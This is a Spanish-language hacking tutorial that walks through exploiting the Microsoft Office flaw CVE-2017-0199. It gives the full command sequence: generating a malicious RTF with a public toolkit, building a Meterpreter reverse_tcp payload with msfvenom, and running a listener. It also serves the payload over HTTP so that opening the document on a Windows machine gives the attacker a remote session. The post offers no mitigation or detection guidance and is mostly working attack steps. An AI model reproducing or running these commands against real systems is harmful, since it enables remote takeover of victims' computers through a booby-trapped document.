Empecemos por saber cómo funciona esta vulnerabilidad, a principios de abril se hablaba sobre este exploit que afecta a todas las versiones de Microsoft office, con solo abrir el documento en Word permite la ejecución de código sin requerir de que las macros se encuentren habilitadas, el exploit se conecta a un servidor remoto controlado por el atacante, descarga un archivo .hta y lo ejecuta.
POC CVE-2017-0199
Creamos una carpeta e ingresamos a este directorio desde la terminal y ponemos lo siguiente:
git clone https://github.com/bhdresh/CVE-2017-0199
Nos vamos al directorio donde hemos descargado el repositorio e ingresamos a la carpeta
Damos permisos de ejecución con chmod +x.
Generamos nuestro archivo malicioso RTF:
python cve-2017-0199_toolkit.py -M gen -w uthh.rtf -u http://192.168.101.12/logo.doc
Movemos el archivo RTF(uthh.rtf) al Escritorio
Ahora abrimos otra Terminal y generamos nuestro payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.101.12 LPORT=4444 -f exe > /tmp/shell.exe
Iniciamos un handler de escucha:
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.101.12; run"
Vemos que ya se encuentra a la escucha
Montaremos un servidor web para que cuando la víctima abra el archivo nosotros obtendremos una session remota.
Nos vamos a la terminal anterior donde se encuentra nuestro repositorio y ponemos lo siguiente:
python cve-2017-0199_toolkit.py -M exp -e http://192.168.101.12/shell.exe -l /tmp/shell.exe
Veremos que el exploit ya está esperando una conexión de la víctima y que está corriendo en el puerto 80.
Pasamos el archivo RTF(uthh.rtf) que anteriormente movimos al escritorio a una maquina Windows.
Una vez que estemos en Windows abrimos el archivo uthh.rtf.
Con tan solo abrir el documento RTF, en la máquina del atacante hemos obtenido una sesision y pues ya estamos dentro de la máquina de la víctima.
By Torres Happy Hacking